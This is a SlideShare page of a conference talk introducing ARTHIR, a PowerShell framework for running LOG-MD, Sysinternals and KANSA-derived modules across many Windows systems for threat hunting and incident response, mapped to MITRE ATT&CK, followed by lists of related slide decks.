SlideShare una empresa de Scribd logo

Michael Gough - Co-Founder Introduces ARTHIR for Remote Threat Hunting and Incident Response

Michael Gough
Michael Gough

Windows remote PowerShell tool to deploy and retrieve scripts, utilities and tools for Incident Response and Threat Hunting

Tecnología
1 de 48
Descargar para leer sin conexión
Michael Gough – Co-Founder IMF Security.com LOG-MD.com
Whoami • Blue Team Defender Ninjas, Incident Responder, Threat Hunter, Logaholic • Michael – Creator of all those Windows Logging Cheat Sheets and the Malware Management Framework • Co-Creator of “Log-MD” – The Log and Malicious Discovery Tool • BDIR Podcast - “Brakeing Down Incident Response” • Special SHOUT OUT to – Olaf Hartong @OlafHartong – Josh Rickard @MSAdministrator LOG-MD.com
The Challenge LOG-MD.com
So what’s the problem? • There is an event • We would like to investigate it • We walk in with our laptops – Or you use one of your systems • What tools can you or we use to look across all your Windows systems? • Without installing anything!!!! • Using what is already on all Windows systems LOG-MD.com
What are our options? • Use what we already have like SCCM, BigFix, etc. • Install a tool with an agent, deal with more agent bloat and agent interaction • Remote into the system • Do a forensics acquisition • Use what is already on the system, living-off-the-land • What we need is already found on all Windows systems! • How can we share what we do with enterprise solutions? • Use something the community can contribute to LOG-MD.com
The Challenge • Whether you are a Blue Teamer investigating your own environment • Or a consultant investigating a client • We need a way to execute a wide range of tools, utilities and scripts remotely to 1, 100 or 1000 systems • It needs to be flexible enough to allow us to run, respond, and hunt for many things LOG-MD.com
Requirements • Fits on a thumb drive • Can run scripts • Can run tools (no GUI) • Can run utilities (no GUI) • Can run larger jobs (Hash/Registry snapshots) • Schedule Jobs that can run things on a regular basis LOG-MD.com
Requirements • Walk in with a laptop • Or use one of your systems • Domain attached and domain creds • No requirement to install anything • Well… we want you to upgrade to PowerShell v5 • PS v5 is the only way to get good PowerShell logging – You didn’t think I wasn’t going to mention the Malware Archaeology Cheat Sheets did you? LOG-MD.com
What do you have and use? • What tools do you use for Threat Hunting and Incident Response? • A bunch of utilities, tools, scripts? • An EDR/EPP solution? • Open Source tools and projects? • Do you have anything? • More importantly do you have budget? LOG-MD.com
My Top 10 List of tools 1. Log Management – Centralize data collection – Query all the data 2. BigFix or equivalent – Query anything you want on a system – Run scripts, utilities, tools, etc. – Run remediation jobs 3. LOG-MD – Log Harvesting – Hunting – AutoRuns – PowerShell – SRUM – Much more LOG-MD.com
My Top 10 4. 5. 6. 7. 8. 9. 10. LOG-MD.com
The problem I wanted to solve • I want to query all the things #2 • I want to run scripts, utilities, tools #2 • I want to have the option to centralize the data #1 • I want to query that data #1 • I don’t want to, or can’t install anything • Of course I want to run my favorite utility/tool – LOG-MD-Professional LOG-MD.com
The problem I wanted to solve • I am one of the creators of LOG-MD • It is a great utility/tool • It does a LOT of what I need to investigate a system • I just needed a way to run it remotely on 1, 100 or 1000 systems to do Threat Hunting and/or Incident Response • And pull back the reports and organize them • Maybe even collect them into a Log Management solution #1 • Without a enterprise solution like BigFix #2 LOG-MD.com
Get to it LOG-MD.com
3 years ago… • We announced LOG-MD at this very conference • Today we would like to announce the release of… • ATT&CK Remote Threat Hunting Incident Response ARTHIR.com
PowerShell? • PowerShell is on every Windows system • Can we use that? • But can we run our own special binaries? • We love our own tools • Create scripts • Something modular • Allows for community support ARTHIR.com
• A modular framework • Leverages an existing project that we modified to do what we wanted and needed • KANSA was good, but lacked some capabilities • I needed to run all features of LOG-MD and pull the reports back • KANSA did not work well at all for LOG-MD • And run other utilities, say Sysinternals ARTHIR.com
• So KANSA did some kewl stuff, just not enough • So we modified it • We had a couple issues • Olaf Hartong helped us with report retrieval • Josh Rickard helped us with scheduled tasks • Once these changes were added suddenly we had something that gave me a LOT of what BigFix could do ARTHIR.com
MITRE ATT&CKTM ARTHIR.com
What does ATT&CK have to do with it? • We LOVE MITRE ATT&CK • It is a GREAT place to map your hunts to • Or what to detect and hunt for • It’s what your adversaries ACTUALLY do in their attacks • If you can detect and/or hunt for the techniques in MITRE ATT&CK… you are WAY ahead of most ARTHIR.com
MITRE ATT&CKTM • The A in ARTHIR stands for ATT&CKTM • The idea here is to encourage you and anyone making modules to map their efforts to MITRE ATT&CK • Help us Help the rest of us • Take this information and any other detection and hunting you can do and add it to YOUR own ATT&CK Matrix ARTHIR.com
Add your ATT&CK Mappings • Check MITRE ATT&CK Tactics and Techniques and add them to the ARTHIR module • Map them to an overall matrix ARTHIR.com
Cheat Sheets • We released two ATT&CK cheat sheets as a part of my SANS THIR talk in NOLA last year • The goal was to see how good, or bad really good logging would be for detecting or hunting the techniques in ATT&CK • It was shocking how much coverage there was • Over 80% ARTHIR.com
Fill out YOUR ATT&CK Matrix ARTHIR.com
Remote • The R in ARTHIR stands for Remote • We need to be able to hunt and respond remotely • Execute what we want on 1, 10, 100, or 1000 systems • And not 1 by 1 like you would have to with RDP or some EDRs • Bring back results to a central system • Like BigFix can do ARTHIR.com
Threat Hunting • The TH in ARTHIR stands for Threat Hunting • We need to be able to hunt for artifacts from the techniques the adversaries use • Run additional tools and utilities to hunt • Centrally send results to say… log management ARTHIR.com
Incident Response • The IR in ARTHIR stands for Incident Response • We need to be able to respond to an attack • Do additional investigation from an alert • Run additional tools and utilities • Centrally send results to say… log management ARTHIR.com
Modular • We used the KANSA framework • Even ported a few of the KANSA modules • This framework design worked for us, no reason to totally reinvent the wheel • Create a module, add it to modules.conf • Run the execution parameters • Retrieve the reports ARTHIR.com
RECON • We provided some PowerShell scripts to get system names from Active Directory • You need to build a list of systems • And we provided a Ping script so you can test those system names are alive • Add these to Hosts.txt to run your modules against ARTHIR.com
Available modules • Several more popular KANSA modules have been converted • More will we done as we move forward and need them • We provided templates so YOU can do it too • Remember that ‘community can contribute’ statement from earlier? ARTHIR.com
Root Directory ATT&CK Documentation Known 3rd-Party Modules Recon ARTHIR.ps1 Hosts.txt ARTHIR.com Some ATT&CK Matrix you can use How To Documentation Known 3rd party modules for ARTHIR Where all the modules are and modules.conf Where Recon scripts live The main ARTHIR script Where you places hosts to run modules on
Module types Bin Cleanup Info Kansa_Legacy LOG-MD LOG-MD_Tasks Sysinternals Templates ARTHIR.com Where you place .EXE and Zip files Module(s) to delete ARTHIR remnants Modules to collect info about a system Converted KANSA modules All LOG-MD modules Modules to schedule LOG-MD hourly/daily Converted KANSA Sysinternals modules Templates to make your own modules
KANSA converted modules ### Configuration modules # Kansa_LegacyConfigGet-Anti-MW-HealthStatus.ps1 # Kansa_LegacyConfigGet-Anti-MW-InfectionStatus.ps1 # Kansa_LegacyConfigGet-Hotfix_Patches.ps1 # Kansa_LegacyConfigGet-Local_Accounts.ps1 # Kansa_LegacyConfigGet-Local_Admin_Accounts.ps1 ### Log modules # Kansa_LegacyLogGet-AppCompatCache.ps1 # Kansa_LegacyLogGet-CBS_Log.ps1 ARTHIR.com
KANSA converted modules ### Network modules # Kansa_LegacyDiskGet-Temp_Dir_Listing.ps1 # Kansa_LegacyDiskGet-User_Name_Dir_Listing.ps1 # Kansa_LegacyDiskGet-User_Name_Dir_Listing_List_of_Extensions.ps1 # Kansa_LegacyDiskGet-Users_Dir_Listing.ps1 ### Network modules # Kansa_LegacyNetGet-Arp.ps1 # Kansa_LegacyNetGet-DNS-Cache.ps1 # Kansa_LegacyNetGet-Net-IP-Interface.ps1 # Kansa_LegacyNetGet-Netstat.ps1 ### Cleanup/Delete ARTHIR folders # CleanupGetDelete_ARTHIR_Folders.ps1 ARTHIR.com
Templates • Get-Binary-Template.ps1 • Get-Script-Template.ps1 • Get-Task-Template-Daily.ps1 • Get-Task-Template-Hourly.ps1 • Get-Zip-Template.ps1 • Variables used to make editing/changing modules easier than KANSA ARTHIR.com
Modules for Utility/Tools • LOG-MD… Duh • LOG-MD Free Edition • LOG-MD-Professional, all features • LOG-MD-Professional Tasks, Hourly & Daily • Sysinternals – Sigcheck • Sysinternals - Handle ARTHIR.com
DEMO ARTHIR.com
LOG-MD.com
You will make PowerShell noise • Since ARTHIR uses PowerShell… • The adversaries uses PowerShell • You will add events to the PowerShell logs • So test and whitelist the scriptblocks that ARTHIR creates • Make it easier to hunt the bad • LOG-MD provides a Whitelist_PowerShell.txt with many exclusions ARTHIR.com
Some ARTHIR PS Exclusions # ARTHIR related items to exclude known ARTHIR components # *ARTHIR - * *## ARTHIR* *$ARTHIR_Dir* *CODE ARTHIR* *ARTHIR* *$ARTHIR_OutputDir* *value="ProcessName. ProcId. HandleId. Owner. Type. Perms. Name* *Write-Output "Prefetch not enabled on* # # More generic ARTHIR scriptblocks # *PackageManagement.format.ps1xml* *NestedModules="Microsoft.PowerShell.Commands.Management.dll* *RootModule = "Microsoft.PowerShell.PackageManagement.dll* *System.Management.Automation.PSDriveInfo] $driveInfo* *Microsoft.PowerShell.ManagementTest-Path $pathToValidate* *Microsoft.PowerShell.ManagementTest-Path $getPathItems* *function PSCopyFileFromRemoteSession* *function PSGetFileMetadata* *function PerformCopyFileFromRemoteSession* *function PSSourceSupportsAlternateStreams* *indentString = "+ PSComputerName : " + $originInfo.PSComputerName* *-ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView* *# .ExternalHelp System.Management.Automation.dll-help.xml* LOG-MD.com
Conclusion • Try it you’ll like it • Mikey does… • Contribute • Send us ideas • It’s Open Source on GitHub • www.ARTHIR.com ARTHIR.com
Resources ARTHIR.com
Cheat Sheets • Windows ATT&CK Logging Cheat Sheet • Windows ATT&CK LOG-MD Cheat Sheet – www.MalwareArchaeology.com/cheat-sheets • ATT&CK Matrix Spreadsheet template – Comes with ARTHIR Get ARTHIR • www.ARTHIR.com • https://github.com/MalwareArchaeology/ARTHIR LOG-MD.com
MITRE ATT&CKTM Sites MITRE ATTACK • https://attack.mitre.org/ Enterprise • https://attack.mitre.org/techniques/enterprise/ ATT&CK Navigator • https://mitre.github.io/attack-navigator/enterprise/ LOG-MD.com
Recommend Sites OSSEM - Open Source Security Events Metadata • https://github.com/Cyb3rWard0g/OSSEM SOCPrime SIGMA to SIEM convertor • https://uncoder.io/ SIGMA - Generic Signature Format for SIEM Systems • https://github.com/Neo23x0/sigma Red Canary Atomic Red Team • https://atomicredteam.io/ MATE - MITRE ATT&CK® Technique Emulation • https://github.com/fugawi/mate Atomic Threat Coverage • https://github.com/krakow2600/atomic-threat-coverage LOG-MD.com
Recommend Sites The ThreatHunter-Playbook • https://github.com/Cyb3rWard0g/ThreatHunter- Playbook OLAF Hartong ThreatHunting | A Splunk app mapped to MITRE ATT&CK to guide your threat hunts • https://github.com/olafhartong/ThreatHunting Sysmon-modular | A Sysmon configuration repository for everybody to customize • https://github.com/olafhartong/sysmon-modular LOG-MD.com
Videos MITRE ATT&CKCon • https://www.youtube.com/playlist?list=PLkTA pXQou_8JrhtrFDfAskvMqk97Yu2S2 LOG-MD.com
Questions • You can find us on the Twitters – @HackerHurricane • LOG-MD.com • MalwareArchaeology.com • Preso will be on SlideShare and linked on MalwareArchaeology.com • Listen to the PodCast to hear the rest of this topic – http://www.brakeingdownir.libsyn.com/ LOG-MD.com

Recomendados

Windows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beWindows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beMichael Gough
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacksMichael Gough
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
The top 10 windows logs event id's used v1.0
The top 10 windows logs event id's used v1.0The top 10 windows logs event id's used v1.0
The top 10 windows logs event id's used v1.0Michael Gough
 
Cyber Threat Intelligence: Building and maturing an intelligence program that...
Cyber Threat Intelligence: Building and maturing an intelligence program that...Cyber Threat Intelligence: Building and maturing an intelligence program that...
Cyber Threat Intelligence: Building and maturing an intelligence program that...Mark Arena
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturityDNIF
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKMITRE ATT&CK
 

Recomendados

Windows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beWindows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beMichael Gough
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacksMichael Gough
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
The top 10 windows logs event id's used v1.0
The top 10 windows logs event id's used v1.0The top 10 windows logs event id's used v1.0
The top 10 windows logs event id's used v1.0Michael Gough
 
Cyber Threat Intelligence: Building and maturing an intelligence program that...
Cyber Threat Intelligence: Building and maturing an intelligence program that...Cyber Threat Intelligence: Building and maturing an intelligence program that...
Cyber Threat Intelligence: Building and maturing an intelligence program that...Mark Arena
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturityDNIF
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKMITRE ATT&CK
 
Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) MITRE ATT&CK
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghOWASP Delhi
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Global Cyber Threat Intelligence
Global Cyber Threat IntelligenceGlobal Cyber Threat Intelligence
Global Cyber Threat IntelligenceNTT Innovation Institute Inc.
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber worldAkash Sarode
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Offensive OSINT
Offensive OSINTOffensive OSINT
Offensive OSINTChristian Martorella
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideMITRE ATT&CK
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceMITRE - ATT&CKcon
 
ATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsMITRE ATT&CK
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesJorge Orchilles
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
RMISC logging for hackers
RMISC logging for hackersRMISC logging for hackers
RMISC logging for hackersMichael Gough
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0Michael Gough
 

Más contenido relacionado

La actualidad más candente

Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) MITRE ATT&CK
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghOWASP Delhi
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber worldAkash Sarode
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideMITRE ATT&CK
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceMITRE - ATT&CKcon
 
ATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsMITRE ATT&CK
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesJorge Orchilles
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 

La actualidad más candente (20)

Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?)
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
Global Cyber Threat Intelligence
Global Cyber Threat IntelligenceGlobal Cyber Threat Intelligence
Global Cyber Threat Intelligence
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber world
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
 
Offensive OSINT
Offensive OSINTOffensive OSINT
Offensive OSINT
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
 
ATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsATT&CK Updates- Campaigns
ATT&CK Updates- Campaigns
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 

Similar a Michael Gough - Co-Founder Introduces ARTHIR for Remote Threat Hunting and Incident Response

RMISC logging for hackers
RMISC logging for hackersRMISC logging for hackers
RMISC logging for hackersMichael Gough
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0Michael Gough
 
Functionality, security and performance monitoring of web assets (e.g. Joomla...
Functionality, security and performance monitoring of web assets (e.g. Joomla...Functionality, security and performance monitoring of web assets (e.g. Joomla...
Functionality, security and performance monitoring of web assets (e.g. Joomla...Sanjay Willie
 
Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0Michael Gough
 
Hot to build continuously processing for 24/7 real-time data streaming platform?
Hot to build continuously processing for 24/7 real-time data streaming platform?Hot to build continuously processing for 24/7 real-time data streaming platform?
Hot to build continuously processing for 24/7 real-time data streaming platform?GetInData
 
Logging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch themLogging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch themMichael Gough
 
Ask a Malware Archaeologist
Ask a Malware ArchaeologistAsk a Malware Archaeologist
Ask a Malware ArchaeologistMichael Gough
 
Commodity malware means YOU
Commodity malware means YOUCommodity malware means YOU
Commodity malware means YOUMichael Gough
 
When Security Tools Fail You
When Security Tools Fail YouWhen Security Tools Fail You
When Security Tools Fail YouMichael Gough
 
Inventory Tips & Tricks
Inventory Tips & TricksInventory Tips & Tricks
Inventory Tips & TricksDell World
 
Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Michael Gough
 
Logging for hackers SAINTCON
Logging for hackers SAINTCONLogging for hackers SAINTCON
Logging for hackers SAINTCONMichael Gough
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidMatthew Johnson
 
Robot - 5 Reasons Developers Love Robot Schedule
Robot - 5 Reasons Developers Love Robot ScheduleRobot - 5 Reasons Developers Love Robot Schedule
Robot - 5 Reasons Developers Love Robot ScheduleHelpSystems
 
Hacking for fun & profit - The Kubernetes Way - Demi Ben-Ari - Panorays
Hacking for fun & profit - The Kubernetes Way - Demi Ben-Ari - PanoraysHacking for fun & profit - The Kubernetes Way - Demi Ben-Ari - Panorays
Hacking for fun & profit - The Kubernetes Way - Demi Ben-Ari - PanoraysDemi Ben-Ari
 
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesCNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesSam Bowne
 
Smart Platform Infrastructure with AWS
Smart Platform Infrastructure with AWSSmart Platform Infrastructure with AWS
Smart Platform Infrastructure with AWSJames Huston
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware AnalysisAndrew McNicol
 

Similar a Michael Gough - Co-Founder Introduces ARTHIR for Remote Threat Hunting and Incident Response (20)

RMISC logging for hackers
RMISC logging for hackersRMISC logging for hackers
RMISC logging for hackers
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0
 
Functionality, security and performance monitoring of web assets (e.g. Joomla...
Functionality, security and performance monitoring of web assets (e.g. Joomla...Functionality, security and performance monitoring of web assets (e.g. Joomla...
Functionality, security and performance monitoring of web assets (e.g. Joomla...
 
Ranger BSides-FINAL
Ranger BSides-FINALRanger BSides-FINAL
Ranger BSides-FINAL
 
Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0
 
Hot to build continuously processing for 24/7 real-time data streaming platform?
Hot to build continuously processing for 24/7 real-time data streaming platform?Hot to build continuously processing for 24/7 real-time data streaming platform?
Hot to build continuously processing for 24/7 real-time data streaming platform?
 
Logging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch themLogging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch them
 
Ask a Malware Archaeologist
Ask a Malware ArchaeologistAsk a Malware Archaeologist
Ask a Malware Archaeologist
 
Commodity malware means YOU
Commodity malware means YOUCommodity malware means YOU
Commodity malware means YOU
 
When Security Tools Fail You
When Security Tools Fail YouWhen Security Tools Fail You
When Security Tools Fail You
 
Inventory Tips & Tricks
Inventory Tips & TricksInventory Tips & Tricks
Inventory Tips & Tricks
 
Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0
 
Logging for hackers SAINTCON
Logging for hackers SAINTCONLogging for hackers SAINTCON
Logging for hackers SAINTCON
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
 
Robot - 5 Reasons Developers Love Robot Schedule
Robot - 5 Reasons Developers Love Robot ScheduleRobot - 5 Reasons Developers Love Robot Schedule
Robot - 5 Reasons Developers Love Robot Schedule
 
Hacking for fun & profit - The Kubernetes Way - Demi Ben-Ari - Panorays
Hacking for fun & profit - The Kubernetes Way - Demi Ben-Ari - PanoraysHacking for fun & profit - The Kubernetes Way - Demi Ben-Ari - Panorays
Hacking for fun & profit - The Kubernetes Way - Demi Ben-Ari - Panorays
 
